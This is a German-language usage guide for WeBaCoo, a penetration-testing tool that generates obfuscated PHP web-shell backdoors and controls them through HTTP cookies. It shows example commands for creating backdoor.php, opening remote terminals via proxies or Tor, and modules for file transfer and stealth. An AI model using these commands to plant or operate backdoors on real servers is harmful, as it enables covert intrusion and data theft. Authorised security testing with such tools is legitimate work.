
Web Backdoor Cookie Script-Kit
| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \
\ /\ / __/ |/ / (| | _/\ () | (_) |
/ / __/ _,|_/_/ _/
Web Backdoor Cookie Script-Kit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Geschrieben von: Anestis Bechtsoudis @ bechtsoudis.com Copyright (C) 2011-2012 Anestis Bechtsoudis
Das Tool dient ausschließlich zu Testzwecken und darf nur verwendet werden, wenn eine ausdrückliche Zustimmung eingeholt wurde. Nicht für illegale Zwecke verwenden.
Jegliche Modifikationen, Änderungen oder Anpassungen dieser Anwendung sind zulässig, jedoch müssen öffentliche Veröffentlichungen, die diesen Code verwenden, vom Ersteller genehmigt werden. Weitere Informationen finden Sie in der Datei LICENSE.
Wenn Sie "libio-socket-socks-perl" für die Tor-Proxy-Funktion nicht installieren möchten, kommentieren Sie Zeile 25 in webacoo.pl aus.
webacoo.pl [Optionen]
Optionen: -g Backdoor-Code generieren (-o ist erforderlich)
-f FUNCTION Zu verwendende PHP-Systemfunktion FUNCTION 1: system (Standard) 2: shell_exec 3: exec 4: passthru 5: popen
-o OUTPUT Dateiname der generierten Backdoor-Ausgabe
-r Unverschlüsselten Backdoor-Code zurückgeben
-t Remote-"Terminal"-Verbindung herstellen (-u ist erforderlich)
-u URL Backdoor-URL
-e CMD Einzelbefehlsausführungsmodus (-t und -u sind erforderlich)
-m METHOD Zu verwendende HTTP-Methode (Standard ist "GET")
-c C_NAME Cookie-Name (Standard: "M-cookie")
-d DELIM Begrenzer (Standard: Neuer Zufallswert pro Anfrage)
-a AGENT HTTP-Header User-Agent (Standard vorhanden)
-p PROXY Proxy verwenden (tor, ip:port oder user:pass:ip:port)
-v LEVEL Ausführlichkeitsgrad LEVEL 0: keine zusätzlichen Informationen (Standard) 1: HTTP-Header anzeigen 2: HTTP-Header + Daten anzeigen
-l LOG Aktivität in Datei protokollieren
-h Hilfe anzeigen und beenden
update Auf Updates prüfen und ggf. anwenden
Seit Version 0.2.1 wurde eine Unterstützung für Erweiterungsmodule hinzugefügt, um WeBaCoo zusätzliche Funktionen bereitzustellen. Im Terminal-Modus können Sie 'load' eingeben, um die verfügbaren Module aufzulisten und das gewünschte zu initialisieren. Mit 'unload' kehren Sie zum ursprünglichen Terminal-Modus zurück.
Verfügbare Erweiterungsmodule: o mysql-cli MySQL-Kommandozeilenmodul o psql-cli Postgres-Kommandozeilenmodul o upload Datei-Upload-Modul mittels HTTP Post o download Datei-Download-Modul mittels stdout-Ausgabe über 'od' und 'xxd' o stealth Erhöht die Tarnung durch .htaccess-Handhabung
Erstelle eine verschleierte Backdoor 'backdoor.php' mit Standardeinstellungen ./webacoo.pl -g -o backdoor.php
Erstelle eine unverschleierte Backdoor 'raw-backdoor.php' unter Verwendung der Funktion 'passthru' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
Stelle eine "Terminal"-Verbindung mit dem entfernten Host mit Standardeinstellungen her ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
Stelle eine "Terminal"-Verbindung mit dem entfernten Host her und setze einige Argumente ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
Stelle eine "Terminal"-Verbindung mit dem entfernten Host über einen lokalen HTTP-Proxy her ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
Stelle eine "Terminal"-Verbindung mit dem entfernten Host über einen HTTP-Proxy mit Basisauthentifizierung her ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
Stelle eine "Terminal"-Verbindung mit dem entfernten Host über Tor her und protokolliere die Aktivität ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt